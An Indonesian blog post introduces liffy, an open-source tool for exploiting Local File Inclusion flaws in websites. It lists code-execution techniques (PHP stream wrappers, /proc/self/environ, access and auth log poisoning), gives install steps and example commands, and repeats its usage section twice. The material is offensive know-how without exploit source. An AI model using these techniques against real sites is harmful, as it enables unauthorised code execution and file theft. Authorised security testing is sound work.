Tools liffy | Local File Inclusion Exploitation Tools
Minggu, 16 Juni 2019
Tulis Komentar
Tools liffy | Local File Inclusion Exploitation Tools
Nelo.F4 - Tools liffy | Local File Inclusion Exploitation Tools adalah suatu tools untuk menemukan bug LFI/Local File Inclusion di suatu website. banyak dari kita berbondong" untuk menjadi seorang bug hunter atau anonymous white hat, tetapi banyak juga dari kita semua yang belum mengetahui tentang tools bermanfaat ini hehe langsung saja ke pembahasanya tanpa berlama lama.
Tools liffy v.2.0 adalah tools liffy yang ditingkatkan dari tools liffy yang di buat oleh rotlogix.
Main feature
- data:// for code execution
- expect:// for code execution
- input:// for code execution
- filter:// for arbitrary file reads
- /proc/self/environ for code execution in CGI mode
- Apache access.log poisoning
- Linux auth.log SSH poisoning
- Direct payload delivery with no stager
- Support for absolute and relative path traversal
- Support for cookies for authentication
Installation
Clone Repository$ git clone https://github.com/mzfr/liffy
Buat virtual environment
$ python -m venv <name-of-virtual-env>
Contoh:$ python -m venv liffy
Aktifkan venv
$ source liffy/bin/activate
Install Dependencies
$ pip install -r requirements.txt
NOTE! liffy menggunakan msfvenom untuk menghasilkan payload php, Jadi Anda seharusnya sudah menginstal metasploit.
Usage
usage: liffy.py [-h] [-d] [-i] [-e] [-f] [-p] [-a]
[-ns] [-r] [--ssh] [-l LOCATION] [--cookies COOKIES]
url
positional arguments:
url URL to test for LFI
optional arguments:
-h, --help show this help message and exit
-d, --data Use data:// technique
-i, --input Use input:// technique
-e, --expect Use expect:// technique
-f, --filter Use filter:// technique
-p, --proc Use /proc/self/environ technique
-a, --access access logs technique
-ns, --nostager execute payload directly, do not use stager
-r, --relative use path traversal sequences for attack
--ssh SSH auth log poisoning
-l LOCATION, --location LOCATION
path to the target file (access log, auth log, etc.)
--cookies COOKIES session cookies for authentication
Check the URL with data://
Option: -d or --data
Ex: python liffy.py http://example.com/?id= -d
Check the URL with input://
Option: -i or --input
Ex: python liffy.py http://example.com/?id= -i
Check the URL with expect://
Option: -e or --expect
Ex: python liffy.py http://example.com/?id= -e
Check the URL with filter://
Option: -f or --filter
Ex: python liffy.py http://example.com/?id= -f
Use /proc/self/environ for code execution
Option: -p or --proc
Ex: python liffy.py http://example.com/?id= -p
Using Apache access.log poisoning
Option: -a or --access
Ex: python liffy.py http://example.com/?id= -a
Using SSH auth.log poisoning
Option: -s or --ssh
Ex: python liffy.py http://example.com/?id= -s
Relatively traverse directories
Option: -r
This option can be used along with other options so relatively traverse the directories.
EX:
- python liffy.py http://example.com/?id= -s -r
- python liffy.py http://example.com/?id= -p -r
- python liffy.py http://example.com/?id= -a -r
Specify log path
Option: -l or --location
This option has to be used either with all the log techniques like authlog, sshlog
EX:
- python liffy.py http://example.com/?id= -s -l /var/auth.log
- python liffy.py http://example.com/?id= -a -l /var/apache2/access.log
By default the following location is used:
For SSH auth.log - /var/log/auth.log
For apache2 access.log - /var/log/apache2/access.log
Author by mzfr
Thanks to mzfr - kitploit.com
[-ns] [-r] [--ssh] [-l LOCATION] [--cookies COOKIES]
url
positional arguments:
url URL to test for LFI
optional arguments:
-h, --help show this help message and exit
-d, --data Use data:// technique
-i, --input Use input:// technique
-e, --expect Use expect:// technique
-f, --filter Use filter:// technique
-p, --proc Use /proc/self/environ technique
-a, --access access logs technique
-ns, --nostager execute payload directly, do not use stager
-r, --relative use path traversal sequences for attack
--ssh SSH auth log poisoning
-l LOCATION, --location LOCATION
path to the target file (access log, auth log, etc.)
--cookies COOKIES session cookies for authentication
Check the URL with data://
Option: -d or --data
Ex: python liffy.py http://example.com/?id= -d
Check the URL with input://
Option: -i or --input
Ex: python liffy.py http://example.com/?id= -i
Check the URL with expect://
Option: -e or --expect
Ex: python liffy.py http://example.com/?id= -e
Check the URL with filter://
Option: -f or --filter
Ex: python liffy.py http://example.com/?id= -f
Use /proc/self/environ for code execution
Option: -p or --proc
Ex: python liffy.py http://example.com/?id= -p
Using Apache access.log poisoning
Option: -a or --access
Ex: python liffy.py http://example.com/?id= -a
Using SSH auth.log poisoning
Option: -s or --ssh
Ex: python liffy.py http://example.com/?id= -s
Relatively traverse directories
Option: -r
This option can be used along with other options so relatively traverse the directories.
EX:
- python liffy.py http://example.com/?id= -s -r
- python liffy.py http://example.com/?id= -p -r
- python liffy.py http://example.com/?id= -a -r
Specify log path
Option: -l or --location
This option has to be used either with all the log techniques like authlog, sshlog
EX:
- python liffy.py http://example.com/?id= -s -l /var/auth.log
- python liffy.py http://example.com/?id= -a -l /var/apache2/access.log
By default the following location is used:
For SSH auth.log - /var/log/auth.log
For apache2 access.log - /var/log/apache2/access.log
Author by mzfr
Thanks to mzfr - kitploit.com
Belum ada Komentar untuk "Tools liffy | Local File Inclusion Exploitation Tools"
Posting Komentar